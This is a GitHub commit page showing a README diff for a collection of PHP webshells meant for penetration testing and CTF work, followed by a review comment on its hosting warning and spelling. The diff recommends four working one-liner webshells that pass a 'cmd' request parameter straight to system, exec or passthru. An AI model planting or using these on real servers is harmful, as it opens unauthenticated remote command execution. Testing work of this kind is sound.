Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
1 parent 3275ca0
commit 226a15d
Showing 1 changed file with 33 additions and 14 deletions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,30 +1,49 @@ | ||
Contributing | ||
============ | ||
|
||
To contribute other shells not listed here... Fork, Push the changes to your repo, then before you request for a Pull, make sure to include a simple description of your **php** web-shell and include a screen-shot of the web-shell (as hosted in your localhost). | ||
|
||
php-webshells | ||
PHP Webshells | ||
============= | ||
|
||
Common PHP shells. Do not put these on a publicly-accessible webserver. | ||
Common PHP shells is a collection of PHP webshells that you may need for your penetration testing (PT) cases or in a CTF challenge. | ||
|
||
Do not host any of the files on a publicly-accessible webserver (unless you know what you are up-to). | ||
|
||
These are provided for education purposes only and legitimate PT cases. | ||
|
||
I'll keep updating the collection whnever I stumble on any new webshell. | ||
|
||
FYI | ||
==== | ||
|
||
These are provided for education purposes only. | ||
|
||
Common php webshells. Do not host the file(s) in your server! | ||
For basic features, I recommend one-liners like : | ||
|
||
++++++++++++++++++++++++++ | ||
`<?php echo passthru($_GET['cmd']); ?>` | ||
|
||
Though I recommend one-liners like | ||
`<?php echo exec($_POST['cmd']); ?>` | ||
|
||
<?php echo passthru($_GET['cmd']); ?> | ||
`<?php system($_GET['cmd']); ?>` | ||
|
||
(Not a full fledged webshell, but works fine) | ||
`<?php passthru($_REQUEST['cmd']); ?>` | ||
|
||
================================================================= | ||
|
||
You can try WebHandler for one-liners. | ||
Cite: | ||
===== | ||
|
||
WebHandler.py works for POST and GET requests: | ||
``` | ||
@software{jacques_pharand_2020_3748072, | ||
author = {Jacques Pharand and | ||
John Troon and | ||
Javier Izquierdo Vera}, | ||
title = {JohnTroony/php-webshells: Collection CS1}, | ||
month = apr, | ||
year = 2020, | ||
publisher = {Zenodo}, | ||
version = {1.1}, | ||
doi = {10.5281/zenodo.3748072}, | ||
url = {https://doi.org/10.5281/zenodo.3748072} | ||
} | ||
<?php system($_GET['cmd']); ?> | ||
<?php passthru($_REQUEST['cmd']); ?> | ||
<?php echo exec($_POST['cmd']); ?> | ||
``` |
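Review bot: The hosting warning in the intro paragraph, "Do not host any of the files on a publicly-accessible webserver (unless you know what you are up-to)", is weaker than the shorter "Do not put these on a publicly-accessible webserver." line just above it, and the parenthetical should be dropped. Every one-liner listed under FYI passes a request parameter (`$_GET['cmd']`, `$_POST['cmd']`, `$_REQUEST['cmd']`) straight to `passthru`, `exec` or `system` with no authentication, so anyone who can reach the file runs commands as the web server user. I would keep the warning unconditional and state that the files belong only in an isolated lab or an authorized engagement and should be deleted when the test ends. Two spelling fixes in the same paragraph: "whnever" should be "whenever" and "up-to" should be "up to". The "education purposes only" sentence also shows up twice in the visible lines, once in the intro and once under FYI; one copy is enough.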